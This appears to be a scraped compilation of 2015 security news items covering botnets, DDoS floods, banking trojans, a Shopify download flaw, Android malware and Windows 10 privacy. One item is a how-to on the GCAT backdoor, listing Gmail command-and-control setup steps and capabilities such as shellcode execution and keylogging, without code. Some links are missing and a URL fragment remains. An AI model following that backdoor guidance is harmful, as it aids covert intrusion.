Microsoft Responds To Windows 10 Spying Concerns, But It will Still Collect Your Data

After a number of controversial data mining features and privacy invasions within Microsoft's newest operating system, Microsoft finally broke the ice, almost two months since the launch of Windows 10.
Microsoft has finally responded to the growing privacy concerns around its new operating system to regain the trust of the users who are concerned about their online privacy related to Windows 10.
In a blog post published Monday, Windows chief Terry Myerson describes three ways in which Windows 10 collects and uses its users data – although he did admit that the OS does regularly phone home by default.
1. Data used for Safety and Reliability Data
This data includes anonymous device ID, device type and crash logs. It does not contain any content or files from your computer that directly identifies you.
What else?
Myerson claims that everything Microsoft collects is "encrypted in transit to [its] servers and then stored in secure facilities." Therefore, no one except Microsoft can be able to access it.
2. Personalization Data
This data helps the system know about your interests and habits in an effort to personalize Windows experience to you. This data includes Cortana, but Microsoft says, it is total unto you what data you want it to collect.
However, Myerson does not specify what type of personal information it collects. Does that include browsing history, typed text and spoken commands for Cortana?
Neither Myerson directly addresses the concerns around Cortana and OneDrive related features of sending data to Microsoft’s servers even after they are disabled.
3. Advertising Data
Despite serving ads in its products, Microsoft emphasizes that "no matter what privacy options you choose, neither Windows 10 nor any other Microsoft software scans the content of your email or other communications, or your files, in order to deliver targeted advertising to you."
According to Microsoft, two types of data are excluded from ad targeting:
Communications (including e-mail and Skype)
File Contents
However, everything else that the company collects from Cortana, Bing searches or store purchases could be used to delivered you targeted advertisements.
Myerson concluded, "Like security, we are committed to following up on all reported issues, continuously probe our software with leading edge techniques, and proactively update supported devices with necessary updates."
He does not answer one question related to major privacy concern: Why is Windows 10 phoning home even when we Turn Off all data collection and tracking features?
However, Myerson has tried well to reassure Windows 10 users that their personal data is fully secure. And, if any privacy issue is bothering you, you can report it here.

Viruses, bulletins, surveys, and gender: hashtag #VB2015

Mention “Virus Bulletin” to someone who doesn’t happen to be in the information security business, like the Lyft driver who took me to the airport a few days ago, and you realize it can sound like an odd name for an information security conference. However, if you’ve been going to Virus Bulletin for a while – my first time speaking at “VB” was in 1994 – it sounds entirely normal. You know that the name comes from a printed bulletin about developments in the world of computer viruses that first appeared in 1989, mailed by post from Oxfordshire in England. You also know that Virus Bulletin is an excellent conference, one in which serious research is front and center, surrounded by ample opportunities to network with fellow combatants in the fight against malicious code and other cyber-badness.
Virus Bulletin 2015, taking place this week in Prague, is shaping up to be the largest VB yet, and if you’re a regular reader of We Live Security you already know that quite a few folks from ESET are on the conference agenda (thanks to the gracious efforts of my British colleague, David Harley, particularly gracious since he is not actually going to VB this year, taking a break after presenting more than a dozen VB papers since 1997).
Security people problems

I wanted to take a moment to highlight a couple of items at this year’s VB that I think are particularly interesting, starting with the information security skills gap, several aspects of which will be discussed at the VB session which my colleague Lysa Myers and I are hosting on Wednesday. The lack of people with the skills needed to secure today’s increasingly complex and increasingly targeted information systems has been covered before on We Live Security. It intersects with another topic dear to our hearts: diversity in the technology workplace and the opportunities for women in information security roles.
Basically, organizations both public and private can’t find enough people to fill important infosec positions. That is not good for those organizations or society at large. When you get a notice saying your personal information may have been exposed due to a security breach, bear in mind that this could be due to the custodian of that information being under-staffed in the security department, and not necessarily because they weren’t willing to pay good money to hire the right people.
You will noticed that I’m using infosec for information security. This not just to save on keystrokes but also to parallel usage in the latest workforce report from (ISC)², the largest not-for-profit membership body of certified cyber, information, software and infrastructure security professionals worldwide (nearly 110,000 members in 160+ countries). The report, titled Women in Security: Wisely Positioned for the Future of InfoSec, puts a brave face on a depressing statistic: women make up a smaller percentage of the infosec workforce today than they did two years ago (10% today versus 11% in 2013).
On the plus side, there are more women in infosec now because the profession is growing, and the wisdom referenced in the report’s title alludes to the fact that women are making their largest impact in governance, risk and compliance (GRC). The role of GRC is an important and growing one in the information assurance and cybersecurity ecosystem. The report indicates that one out of five women identified GRC as their primary functional responsibility, whereas for men it was one out of eight. Hopefully, this means more women will be in a position to rein in the organizational cyber-risk taking that too often contributes to breaches. I will have a few more words on why that might happen in a moment. You can download the survey report here: Women in Security (PDF).
Surveys and suggestions

Surveys and numbers related to security are something I’ve been studying lately (as in going to school to study, at the University of Leicester in England, virtually speaking). I wrote a paper for this year’s VB proceedings titled “Sizing cybercrime” and will be presenting on that topic. Something I learned while poring over piles of cybercrime statistics is that you should not take them at face value. Very few survey results are presented with an appropriate level of transparency. For example, in your efforts to decide where to prioritize your organization’s security spending you might read a report that seems to offer a representative sample of security incident data from 500 companies. But in reality the data could come from a lot less than 500 firms and be supplied by people with an agenda, reported by an entity with an axe to grind or product to sell. As for what constitutes a “security incident” who knows? Many surveys that have reported numbers for these are very vague about what exactly they are.
For a taste of what is wrong with the current state of measuring cybercrime consider this: governments are not making the same effort to report cybercrime as they do ‘traditional’ crime. Want stats on car thefts and bank robberies? Sure, the government has been keeping fairly consistent longitudinal data sets documenting those crimes. Want to know how much cybercrime companies in America have to deal with and what it costs them? Sorry, you’ll have to ask a company that sells security services. Unless you are okay with data from 10 years ago, which is when the U.S. federal government made its one and only attempt to measure those things (in response to my inquiries, I was told it has no plans to try that again).
A lack of crime data is not just annoying to academic criminologists. Consider the two main inputs you need for risk management, bearing in mind that for many organizations risk management of information systems is required by law or regulation. You need to input the likelihood or probability of an adverse event and the impact of the event, in other words, frequency and cost. Good luck trying to get an objective read on either from the current crop of cybercrime statistics.
So instead of quantitative inputs you have to use qualitative measures, which are subjective and thus open to cultural bias. And that brings me to a couple of papers that are not being presented at VB but you may still find stimulating:
‘Trust, emotion, sex, politics, and science: surveying the risk-assessment battlefield’ by Slovic, P. (1999) Risk analysis, 19(4): 689-701 (link is to PDF file).
‘Gender, race, and perceived risk: The “white male” effect’ by Slovic, P., Flynn, J., Finucane, M.L., Satterfield, T.A. and Mertz, C.K. (2000) Health, Risk & Society, 2(2): 159-172 (you may need to go to the library for this one).
Reading these will acquaint you with the cultural theory of risk perception and a fascinating discovery which that theory facilitated. It turns out that one group of people consistently ranks risks lower than the rest of the population, namely: white males. The so-called “White Male Effect” has been discerned in numerous studies where people rate the “riskiness” of different activities and technologies. In other words, white males are less like to say: don’t do that, it’s too risky. This effect was found to persist even when all of the participants were well-educated scientists. And of course, we all know that in the U.S. and many European countries white males are massively over-represented in management roles; for example, 98% of CEOs and 97% of general and operational managers in the U.S. are male, and only 2.5% are non-white (see 2014 BLS stats).
However, it is also true that in countries like the U.S. most of the information security professionals – the people whose warnings about cyber risks presumably went unheeded by management – are white males (90% according to the report cited earlier). A possible explanation is offered by further cultural theory research which indicates that a particular subset of white males – about 30% – consistently judge risks to be extremely low, skewing the overall male riskiness score. Could those be the guys running the companies that are not taking cyber risks seriously enough? And will the influx of women into GRC change the outcome of risk management meetings? Please stay tuned!

Linux XOR DDoS Botnet delivers potent DDoS attacks

Experts at Akamai discovered the Linux XOR DDoS Botnet, a malicious infrastructure used to run potent DDoS attacks against dozens of targets.
Security researchers have discovered a Linux Botnet, dubbed XOR DDoS or Xor.DDoS botnet, that is targeting gaming and education websites with potent DDoS attacks with reached 150 gigabytes per second of malicious traffic.

According to an advisory published by the content delivery network Akamai Technologies, the XOR DDoS botnet has targeted at least 20 websites each day, nearly 90 percent of the targets are located in Asia.

“Akamai’s Security Intelligence Response Team (SIRT) is tracking XOR DDoS, a Trojan malware attackers are using to hijack Linux machines to include within a botnet for distributed denial of service (DDoS) campaigns. To date, the bandwidth of DDoS attacks coming from the XOR DDoS botnet has ranged from a few gigabits per second (Gbps) to 150+ Gbps. The gaming sector is the primary target, followed by educational institutions. Akamai SIRT released a threat advisory this morning authored by Security Response Engineer Tsvetelin “Vincent” Choranov.” states the advisory.

XoR DDoS attack

“In short: Xor.DDoS is a multi-platform, polymorphic malware for Linux OS, and its ultimate goal is to DDoS other machines,” reported a post published by the Blaze Security blog. “The name Xor.DDoS stems from the heavy usage of XOR encryption in both malware and network communication to the C&Cs (command and control servers).”
The researchers observed that the attackers masquerade the IP addresses of the machines involved in the DDoS attack, in some cases they used IP spoofing techniques to make it harder for victims to defend their infrastructure from the attack.

The experts discovered that the XOR DDoS attacks rely on Linux machines that were compromised by cracking weak passwords used to protect the command shell.

Once the attackers have obtained the access to the Linux machine whey use root privileges to launch a script used to download and executes a malicious binary file.

“XOR DDoS is an example of attackers switching focus and building botnets using compromised Linux systems to launch DDoS attacks. This happens much more frequently now than in the past, when Windows machines were the primary targets for DDoS malware.” explained Stuart Scholly, senior vice president and general manager of Akamai’s Security Business Unit.

XOR DDoS isn’t the unique botnet composed of Linux systems recently discovered, other examples of Linux-based malware include the Spike DDoS toolkit and the IptabLes and IptabLex malware that last year targeted Linux servers to run large-scale DDoS attacks.

“There are an increasing number of Linux vulnerabilities for malicious actors to target, such as the heap-based buffer overflow vulnerability found earlier this year in the GNU C library. However, XOR DDoS itself does not exploit a specific vulnerability.” explained the advisory published by Akamai.

Pirate Bay co-founder Gottfrid Svartholm, aka Anakata, Released from Prison
Gottfrid Svartholm Warg, the co-founder of the notorious file-sharing website The Pirate Bay, has been released from a Sweden prison following three years behind bars for hacking and copyright offenses.
Yes, Svartholm Warg, also known as Anakata, is a free man again.
Svartholm was convicted on both Swedish copyright offences and Danish hacking conspiracy connected to The Pirate Bay.
The news comes just a few months after the third and last founder of Pirate Bay Fredrik Neij (also known as TiAMO) was released from a Swedish prison after serving his 10-month prison sentence.
Svartholm has not yet made any public statements following his release from a Swedish prison on Saturday. His release was reported by Swedish newspaper Dagens Nyheter.
However, the release was confirmed by Warg's mother Kristina Svartholm on Twitter.
"Yes, #anakata is free now. No more need to call for #freeanakata. Thank you everyone for your important support during these three years!"
Svartholm was arrested in his Cambodian apartment in September 2012, and extradited to Sweden in November 2013, where he served charges for copyright theft. In November 2013, he was finally extradited to Denmark to face charges in the CSC hacking cases.
Once the world's most popular file-sharing website, The Pirate Bay predominantly used to share copyrighted material, such as pirated software, video files and other stuff, free of charge.
Despite the criminal convictions and numerous takedowns in police raids, the Pirate Bay continues to operate, although it has moved to different Web domains several times.

JavaScript DDoS Attack Peaks at 275,000 Requests-Per-Second

Two years ago at the Black Hat conference, WhiteHat Security researchers Jeremiah Grossman and Matt Johansen explained how hackers could in theory leverage an online ad network to distribute malicious JavaScript efficiently and quickly.

Depending on how much money the attacker wanted to spend, they could do just about anything from drive-by download attacks, to search engine poisoning to DDoS attacks.

“For a DDoS attack, for mere dollars we could bring down one Apache server very quickly for probably under $10 and hold it down for a long time,” Grossman told Threatpost in 2013. “I don’t know if it has good DDoS protection how much it would cost us, but it probably wouldn’t cost $100. This means that anyone without DDoS protection is susceptible to a $10 attack that could bring them down.”

Using JavaScript to bring down a target has slowly moved out of the theoretical, given the Great Cannon research done earlier this year by Citizen Lab and a JavaScript-based DDoS attack against 8chan that originated in malicious image files hosted on Imgur. CloudFlare on Friday described a voluminous attack against an unnamed customer that it speculates could have been launched using a mobile ad network.

Researcher Marek Majkowski said the flood attacks peaked at 275,000 HTTP requests per second close to 1.2 billion requests per hour during a four-hour span. Most of the requests came from mobile browsers based in China.

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” Majkowski wrote. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.”

Majkowski said this was not a packet-injection type of attack. Instead it’s likely, users’ mobile browsers were served iframes with ads requested from a mobile ad network. The networks forwarded the requests to the malicious third parties which won the real-time bidding for the slot. The user was served a page containing malicious JavaScript that sent a flood of XHR requests against the targeted website, CloudFlare said.

“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski said. “Attacks like this form a new trend. They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

Vulnerable medical equipment details disclosed online

Security researchers have discovered that vulnerabilities in thousands of critical medical systems have been disclosed online.
The Register reported that Scott Erven, from Protiviti, and Mark Collao, from NeoHapsis, found that many of these machines are at serious risk of being easily exploited by attackers.
One particularly severe example documented by the experts concerned a “very large” US healthcare organization, whose name remains undisclosed for obvious reasons.
Through Shodan, which describes itself as “the world’s first computer search engine that allows you to search the internet for computers”, they found that up to 68,000 of its medical systems had been revealed.
The fact that thousands of other institutions have similarly had their vulnerable equipment effectively put on display suggests that this is an important and timely finding.
“Once we start changing [Shodan search terms] to target speciality clinics like radiology or podiatry or paediatrics, we ended up with thousands with misconfiguration and direct attack vectors,” Mr. Erven told the online news provider.
“Not only could your data get stolen but there are profound impacts to patient privacy.”
Mr. Collao added that cybercriminals with access to such information could theoretically generate comprehensive intelligence on healthcare organizations.
So detailed could such insight be that they could even know what floor certain types of equipment and computers were based.
He commented that part of the vulnerability associated with medical-specific machines is down to their dated operating system.
Many are still using older versions of Windows, such as the now discontinued XP, which leaves them open to multiple attacks.
This is an apparently widespread problem in medical spheres, as WeLiveSecurity documented last month.
The security blogger Graham Cluley commented: “In short, if you’re still running Windows XP you’re not just taking an enormous risk, you’re being – in my opinion – negligent.”
For more detail, please check out the video below, which is of the presentation that Mr. Erven Mr. Collao gave on their findings.

Shifu banking trojan is officially spreading to the UK

The researchers at Security Intelligence announced that Shifu banking trojan is officially spreading to the UK targeting Banks and Wealth Management Firms.
A few weeks ago researchers at Security Intelligence announced the discovery of the sophisticated banking Trojan Shifu, the malicious code has been used to target the customers of more than a dozen Japanese banks. Shifu is considered by the experts an advanced threat, it is suspected to have been developed by Russian-speaking authors that borrowed features from several well-known banking trojan including the popular Zeus VM and Dridex.

Shifu infections

The Shifu banking trojan was designed to circumvent e-banking users by stealing their credentials and digital certificates, it is also able to scrape banking app authentication tokens, and exfiltrate data from smart cards connected to the infected machine.

The Shifu banking Trojan also targets digital signature credentials issued to business users by certification authorities, the malware authors harvest them to impersonate victims and sign documents and sign documents for them.

The expert predicted a rapid diffusion of Shifu and unfortunately, they were right, Shifu has spread from Japan and begun actively attacking UK banks and wealth management firms.

“X-Force researchers confirmed that Shifu is actively attacking online banking customers in order to perform fraudulent transactions. The Shifu Trojan may be new crimeware, but its inner workings are not entirely unfamiliar. The malware relies on a few tried-and-true Trojan mechanisms from other infamous crimeware codes. It appears that Shifu’s internal makeup is being composed by savvy developers who are intimately familiar with other types of banking malware.” states the post published by Security Intelligence.

The authors of the malware have introduced specific features to target users in the UK, the sample detected by the experts in the country no longer injects malicious code into the explorer.exe process, rather launch a new svchost instance and performs all actions from that process.

Shifu began spreading to UK targets in mid-September 2015, initially only a few machines were infected by the banking trojan, but by Sept. 22 hundreds of endpoints were compromised per day.

“Although one relatively modest campaign has already taken place, IBM X-Force researchers believe more widespread infection sprees are yet to come in the U.K. This is likely to be followed with future propagation into other parts of Europe and the U.S.”

The threat actor behind the Shifu campaign is using a variant of the Angler EK which is offered for sale in the underground since 2013.

The researchers observed that the infection process relies on compromised websites hosting the popular Angler exploit kit meanwhile the attack vector are spam emails.

“Although Angler is used by many cybercriminals, they all rely on its ability to evade security mechanisms and its multistep attack technique. To keep automated security off its tracks, Angler attacks are based on a redirection scheme that begins with a clean page or advertising banner and eventually lands on an Angler-poisoned page. The victim’s endpoint is then scanned for the corresponding vulnerabilities, followed by exploitation and the eventual payload drop.” states Security Intelligence.

The Shopify commerce platform is open to RFD attacks

The researcher David Sopas at WebSegura discovered a Reflected Filename Download vulnerability in the popularmulti-channel commerce platform Shopify.
Shopify is a multi-channel commerce platform that helps people sell online, in-store, and everywhere in between. The popular security researchers Davis Sopas at WebSegura has discovered a Reflected Filename Download vulnerability in the Shopify service. Sopas already sent a security report to Shopify explaining that it doesn’t need any authentication like access_token, api_key or even an account on Shopify.

The Reflected Filename Download vulnerability affects the service, the expert explained that browsing the following link on Internet Explorer 9 and 8 browsers, it will show a download dialog with a file named track.bat. If the user launches the batch file it will run Google Chrome with a malicious web page, in this specific case shop just displayed a text, but it is clear that a bad actor could exploit it to carry on malicious activities.||||&_=

Sopas observed that on other browsers like Chrome, Opera, Firefox, Android Browser and Chrome for Android latest versions the user needs to visit a webpage that will force the download by using the HTML5 <A DOWNLOAD> attribute:

Spotify vulnerability

“When the victim visits a specially crafted page with the code above and click the image it will show the download dialog and after downloading it will show that the file is coming from Shopify servers.” states Sopas in a blog post.
The Reflected Filename Download attacks are very insidious because victims usually don’t suspect that have been targeted by hackers, the malicious file they receive appears as offered for download by a trusted source, in this case Shopify website site.

Spotify RFD attack vulnerability

Spotify RFD attack vulnerability 2

Resuming a possible attack scenario is:

The attacker sends a link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc.)
Victim clicks the link because it trust Shopify as source and downloads the file.
Once the file is executed the victims is hijacked
Sopas criticized the approach of the Shopify company that underestimated the security issue as visible in the timeline published by Sopas.

“In my opinion this was the last time I’ll send anything to Shopify. We have different views on patching security reports.
An example: Some of the bounties that they already paid on HackerOne are Self-XSS and Missing SPF. Both issues were awarded with the minimum amount – $500. I don’t know where or why these issues are more dangerous than my security report but it’s up to them.
I was patient and gave them enough time to fix this issue – even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems to much. So beware of this issue because according to Shopify they don’t foresee that this issue will be fixed any time soon.” wrote Sopas.

19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply so I asked for a update
06-04-2015 First contact with Shopify which they reply that it’s being processed
15-04-2015 Shopify told me that this security issue is interesting and ask for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for a update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 Since April without any email from Shopify they replied that they were working on fixing more urgent issues and consider mine a low impact and low priority
23-09-2015 I told them that it’s not a social engineering issue but they still don’t understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and not patching any time soon.

Virus maskovali za didaktickou hru. Nakazit se mohlo až půl miliónu přístrojů

29.9.2015 Mobil

Aplikace BrainTest v Google Play obsahovala malware.
Až 500 000 zařízení bylo infikováno nebezpečným virem poté, co jejich uživatelé stáhli na první pohled nenápadnou didaktickou hru BrainTest. Že byl ke hře připojen i škodlivý kód odhalili minulý týden bezpečnostní experti ze společnosti Check Point.
Nakazit tak velké množství chytrých telefonů a počítačových tabletů se kyberzločincům podařilo jen díky tomu, že dokázali propašovat aplikaci společně s virem na oficiální obchod Google Play. Obelstít se jim tak podařilo bezpečnostní systém, který zkoumá, zda nejsou programy škodlivé.

„Podle statistik Google Play byl pokaždé počet stažení mezi 100 000 a 500 000. Velké množství stažení znamená, že malware byl na Google Play delší dobu a svědčí to o pokročilých útočných metodách, které jsou schopné zamaskovat škodlivý kód i před nejrůznějšími bezpečnostními technikami používanými společností Google k odhalení hrozeb,“ uvedl mediální zástupce Check Pointu Petr Cícha.

Odstranit ze zařízení škodlivý kód, který se nainstaloval společně s hrou BrainTest, není vůbec jednoduché. Malware totiž dokáže zvyšovat na napadených přístrojích svá oprávnění. To mu umožňuje zůstat v přístroji i poté, co se uživatel pokusí o jeho odinstalaci.

„Za poslední měsíc odhalil Check Point na Google Play dvě nebezpečné aplikace, což dokazuje, že ani stažení aplikace z oficiálního a důvěryhodného obchodu neznamená, že aplikace je bezpečná,“ doplnil Cícha.

Zabezpečení firemních Wi-Fi přes cloud představil Fortinet

29.9.2015 Zabezpečení
Nové funkce svého cloudového systému řízení FortiCloud a novou řadu cloudově řízených bezdrátových přístupových bodů pro sítě WLAN oznámil Fortinet. Podle jeho představitelů jde o nejvyšší zabezpečení bezdrátových sítí na současném trhu.

Bezdrátové přístupové body řady FortiAP-S umožňují vynechat samostatné WLAN kontroléry, aniž by tím byla síť vystavena kybernetickým hrozbám.

Každý access point je centrálně řízený pomocí cloudového systému FortiCloud, který podle výrobce umožňuje snadnou implementaci i správu, zajišťuje lepší kontrolu a také celkově zjednodušuje infrastrukturu.

Zároveň dovoluje správu flexibilně škálovat podle rozsahu sítě, takže je vhodný pro distribuované podniky s provozy či pobočkami v mnoha lokalitách.

FortiAP-S zahrnují funkce jako prevence průniku, webfiltering, detekce neautorizovaných přístupových bodů, antivirová ochrana, podrobné řízení aplikací a další.

Tyto funkce doplňují neustále aktualizované bezpečnostní informace z laboratoří FortiGuard. Každý přístupový bod FortiAP-S je tak prý v reálném čase chráněný proti nejnovějším bezpečnostním hrozbám.

„Nyní lze aplikovat specifické bezpečnostní politiky pro mobilní zařízení, řízení přístupu k aplikacím a antivirovou ochranu včetně aktualizací přímo v přístupových bodech, čímž zákazníkům poskytujeme další vrstvu ochrany pro prostředí, kde zaměstnanci využívají soukromá zařízení pro pracovní účely,“ dodáváOndřej Šťáhlavský, regionální ředitel pro oblast střední a východní Evropy ve společnosti Fortinet.

Mobile Ad Network exploited to run a major DDoS Attack

Security experts at CloudFlare observed a major DDoS attack against one of their customers that appeared to leverage a mobile ad network.
CloudFlare firms revealed that one of its customers was recently hit by a distributed denial-of-service (DDoS) attack that appeared to leverage a mobile ad network and malicious JavaScript.

The experts explained that the DDoS attack relied on a JavaScrip that generates legitimate HTTP requests.

The possible exploitation of ad network was discussed two years ago at the Black Hat conference by the experts Jeremiah Grossman and Matt Johansen.

Unfortunately, this kind of DDoS attack is being popular in the hacking community, in April security researchers from the University of California at Berkeley and the University of Toronto have uncovered a powerful weapon of the Chinese Government cyber arsenal, dubbed the Great Cannon, used to hit websites with powerful DDoS attacks. The Great Cannon has been used by Chinese authorities to knock-out two anti-censorship GitHub pages and it can be also used as a hacking tool to silently install malware on the targeted machine.

The experts explained that the Great Cannon relies on malicious JavaScript injected into unencrypted traffic in order to carry on DDoS attacks.

Another similar DDoS attack was uncovered last week, experts at Imgur discovered that a vulnerability in the platform was exploited by attackers to target the imageboards 4chan and 8chan.

Now, CloudFlare noticed a large number of HTTP requests addressing one of its customer’s website, the DDoS attack peaked at over 1 billion requests per hour. The experts observed a total of 4.5 billion requests reaching the content delivery network’s servers on the day of the attack.

DDoS attack log

The overall number of unique IP addresses originating the requests is 650,000, 99.8 percent these addresses belong to China.

Experts at CloudFlare discovered that nearly 80 percent of the requests were originated from mobile devices (mobile apps and browsers commonly used by Chinese users).

“Attacks like this form a new trend,” states a blog post published by CloudFlare. “They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” Majkowski wrote. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.” explained the researcher Marek Majkowski.

The experts discovered that the websites from the “Referer” header pointed to an ad aggregator or a link farm. The DDoS attack relies on a JavaScript hosted on these pages and that was able to generate a large number of XMLHttpRequest (XHR) requests.

CloudFlare researchers excluded that the DDoS attack was conducted by injecting TCP packets like observing in the DDoS attack conducted by the Great Cannon.

CloudFlare provided the following description for the attack scenario:

A user was casually browsing the Internet or opened an app on the smartphone.
The user was served an iframe with an advertisement.
The advertisement content was requested from an ad network.
The ad network forwarded the request to the third-party that won the ad auction.
Either the third-party website was the “attack page”, or it forwarded the user to an “attack page”.
The user was served an attack page containing a malicious JavaScript which launched a flood of XHR requests against CloudFlare servers.
“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski added.

Až milion zařízení mohl infikovat nový malware z Google Play

Informace o novém škodlivém kódu, který se objevil v Google Play, zveřejnil Check Point. Tvůrci se podle něj pojistili a do obchodu škodlivý kód umístili hned dvakrát.

Škodlivý kód byl podle informací z Check Pointu připojený ke hře BrainTest, přičemž hra byla umístěná na serverech Google Play hned dvakrát. Podle statistik provozovatele byl přitom pokaždé počet stažení mezi 100 000 a 500 000.

Velké množství stažení tedy znamená, že malware byl na Google Play delší dobu a svědčí to o pokročilých útočných metodách, které jsou schopné zamaskovat škodlivý kód i před nejrůznějšími bezpečnostními technikami používanými společností Google k odhalení hrozeb.

Na tomto malwaru je prý zajímavé i to, že se snažil zvyšovat svá oprávnění. K tomu používal instalaci rootkitu na přístroji, což škodlivému kódu umožňovalo zůstat v přístroji i poté, co se uživatel pokusil o odinstalaci.

Mezi činnosti, které malware vykonává, patří například zobrazování nechtěné reklamy na displeji či instalace dalších programů, které dokážou ukrást citlivé údaje ze zasaženého mobilního zařízení.

Za poslední měsíc podle svých slov Check Point odhalil na Google Play dvě nebezpečné aplikace, což dokazuje, že ani stažení aplikace z oficiálního a důvěryhodného obchodu neznamená, že aplikace je bezpečná. Hrozby jsou prý stále sofistikovanější a snaží se obejít stávající bezpečnostní mechanismy.

How to use GCAT backdoor with Gmail as a C&C server

The GCAT backdoor is a fully featured backdoor which could be controlled by using Gmail as a Command & Control server with multiple advantages for attackers.
Establish a backdoor is one of the main goals for an attacker in order to gain persistence over the targeted machines. There are many hacking tools that allow easily to create backdoors, many of these tools are daily used by professional penetration tested when try to exploit them to compromise a target or to maintain full control over them.

The creation of a backdoor allows an attacker to connect victim’s machine in order to send and execute some commands, send and manipulate files and access administration settings of the system.

Today I want to present you GCAT that is a fully featured backdoor which could be controlled by using Gmail as a Command & Control server, this means that the attacker can send instruction to remote system through a Gmail account.

As you can easily imagine this feature is very important because it help to maintain hidden the backdoor evading classic detection mechanism based on traffic analysis.

The traffic from a Gmail account will never raise suspicions in the administrators of a network and will never trigger any alarm, also consider that the command and control architecture will be always up and reachable, a factor vital for a botmasters.

The code related to the GCAT backdoor is available on GitHub, the repository included the following two files: a script that’s used to enumerate and send commands to the bots. is the backdoor.
The above files include the gmail_user and gmail_pwd variables that must be edited with the username and password of the Gmail account used as C&C server.

GCAT backdoor

To carry out an attack based on the GCAT backdoor, an attacker has to do the following steps.

Create a dedicated Gmail account
Turn on “Allow less secure apps” under the security settings of the account
Enable IMAP in the account settings
GCAT backdoor allows to perform the following actions:

Execute a system command
Download a file from a client’s system
Upload a file to the clients system
Execute supplied shellcode on a client
Take a screenshot
Lock the clients screen
Force a check in
Start/ Stop keylogger
Below a useful video on the GCAT backdoor:

The World's First $9 Computer is Shipping Today!

The World's First $9 Computer is Shipping Today
Remember Project: C.H.I.P. ?
A $9 Linux-based, super-cheap computer that raised some $2 Million beyond a pledge goal of just $50,000 on Kickstarter will be soon in your pockets.
Four months ago, Dave Rauchwerk, CEO of Next Thing Co., utilized the global crowd-funding corporation ‘Kickstarter’ for backing his project C.H.I.P., a fully functioning computer that offers more than what you could expect for just $9.
C.H.I.P. stands for "Computer Hardware in Products."
At first, the project was looking like a never ending project but here's something exciting — The $9 CHIP computer is shipping.
Yes, Rauchwerk says that the first run of devices is beginning to be distributed to early backers within 7-9 days.
Rauchwerk said, "If you backed the [CHIP] project at the Kernel Hacker Backer level on Kickstarter, you'll receive two CHIP computers — the second by mid-October."
Specifications and Capabilities:
CHIP packages:
1GHz R8 ARM processor
4GB of internal flash storage
512MB of DDR3 RAM
Wi-Fi connection
Looking at the output front of it, CHIP features:
A single full-sized USB port
Microphone input
Headphones output
A composite video output that supports older televisions
A micro USB that supports OTG
As it is an open source project, CHIP offers support for thousands of open source applications such as:
LibreOffice package for editing documents and spreadsheets
Chromium for browsing the Web
VLC Media Player for playing audios as well as videos
Other programs for coding, torrenting, and photo editing, among others
Also, the researchers are calling it as Alpha C.H.I.P.s with initial build root as Ubuntu. They did not stress upon the innovation of the alpha CHIP itself, instead offer a complete How to get started with CHIP that you can follow here.

Quantum Teleportation — Scientists Teleported Quantum Data over 60 Miles

We are just one step closer to creating a Harry Potter or ‘Star Trek’-style Transporter.
However, When we talk about Teleportation, we don't typically mean Teleporting any matter from one place to another as in the Science-fiction Movies.
Rather, Teleportation involves capturing the essential information about something — its "quantum state", to recreate it exactly someplace else.
A month ago, The Hacker News had reported the battle between Quantum computers and Encryption.
Now, with the development of technology, the NIST Scientists have set a new record in the field of “Quantum Teleportation”, as they successfully Teleported a small amount of data (called ‘qubit’) inside light particles over a distance of 60 miles (100 km) through a network of optical fiber.
Teleportation enables transfer of ‘Quantum state’ of a Photon to another Photon in the same state residing remotely at a far-off distance.
This Record being farthest than the previous record, which was less than four times the current one.
Also Read: Entangled Photons on Silicon Chip: Secure Communications & Ultrafast Computers
"We report on Quantum teleportation over optical fiber using four high-detection-efficiency superconducting nanowire single-photon detectors (SNSPDs)," the researchers said in their study.
These Single-Photon Detectors are made possible with advanced research and development by a team of researchers at NIST.
“These SNSPDs make it possible to perform highly efficient multifold photon measurements, allowing us to confirm that the quantum states of input photons were successfully teleported over 100 km of fiber with an average fidelity of 83.7 2.0%”, said the team.
To know how the Quantum Teleportation works, see the image below:
With the full-fledged establishment of the Quantum computers, the future of Cyber security lies within.
Teleportation is a unique phenomenon in both quantum computers and quantum communication. Moreover, the technology overpowering the current computers and communication; following are considered as the achievements by NIST:
Unbreakable encryption
Advanced code-breaking
Want to know more? Download the research paper PDF and see what the future has in-store for us.

Gaza cybergang, where’s your IR team?
28.9.2015 Zdroj: Kaspersky

Gaza cybergang is a politically motivated Arabic cybercriminal group operating in the MENA (Middle East North Africa) region, mainly Egypt, United Arab Emirates and Yemen. The group has been operating since 2012 and became particularly active in Q2 2015.

One interesting new fact about Gaza cybergang activities is that they are actively sending malware files to IT (Information Technology) and IR (Incident Response) staff; this is also obvious from the file names they are sending to victims, which reflect the IT functions or IR tools used in cyber attack investigations.

IT people are known for having more access and permissions inside their organizations than other employees, mainly because they need to manage and operate the infrastructure. This is why getting access to their devices could be worth a lot more than for a normal user.

IR people are also known for having access to sensitive data related to ongoing cyber investigations in their organizations, in addition to special access and permissions enabling them to hunt for malicious or suspicious activities on the network…

The main infection modules used by this group are pretty common RATs: XtremeRAT and PoisonIvy

Some more interesting facts about Gaza cybergang:

Attackers take an interest in government entities, especially embassies, where security measures and IT operations might not be well established and reliable
Use of special file names, content and domain names (e.g., has helped the group perform better social engineering to infect targets
Increasing interest in targeting IT and IR people, which is clear from most of the recent malware file names used
Other operation names:

Political file names targeting Arabic countries

